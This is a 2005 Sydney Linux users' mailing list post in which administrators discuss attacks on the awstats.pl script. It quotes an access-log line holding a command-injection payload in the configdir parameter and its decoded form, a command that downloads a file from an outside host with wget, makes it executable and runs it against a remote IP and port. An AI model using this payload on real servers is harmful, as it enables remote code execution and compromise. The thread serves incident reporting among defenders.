SLUG Mailing List ArchivesSLUG Mailing List ArchivesHi, I've just checked my logs and found this nasty little access: access.log.1:128.xxx.xxx.xxx - - [11/May/2005:08:26:44 +1000] "GET //cgi-bin/awstats.pl?configdir=|%20cd%20%2ftmp%3brm%20-f%20%2ftmp% 2fc%3bwget%20128.xxx.xxx.xxx%2fc%3bchmod%20%2bx%20c%3b.%2fc% 2080.xxx.xxx.xxx%2080%20| HTTP/1.1" 200 732 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" Ouch! They'd tried to run: cd /tmp;rm -f /tmp/c;wget 128.xxx.xxx.xxx/c;chmod +x c;./c 80.xxx.xxx.xxx 80 Voytek, how did you notice you'd been exploited? /me wishes he'd switched on authentication earlier... Rob. On Sun, 2005-05-22 at 00:09 +1000, Voytek Eymont wrote: > I just found how my server was exploited, through awstats. > > even though I've set it as per warning to dissalow browser updates: > > # grep 'AllowToUpdateStatsFromBrowser=1' * > # grep 'AllowToUpdateStatsFromBrowser=0' * > awstats.common:AllowToUpdateStatsFromBrowser=0 > awstats.conf:AllowToUpdateStatsFromBrowser=0 > awstats.mail.conf:AllowToUpdateStatsFromBrowser=0 > awstats.model.conf.rpmsave:AllowToUpdateStatsFromBrowser=0 > > the attacker executed wget/lwp_download to d/l malicious code and execute > using (I think ?) some kernel vulnarability > > > -- > Voytek -- Rob Sharp email/jabber/msn: robATsharp.id.au web: http://sharp.id.au
Attachment:
signature.asc
Description: This is a digitally signed message part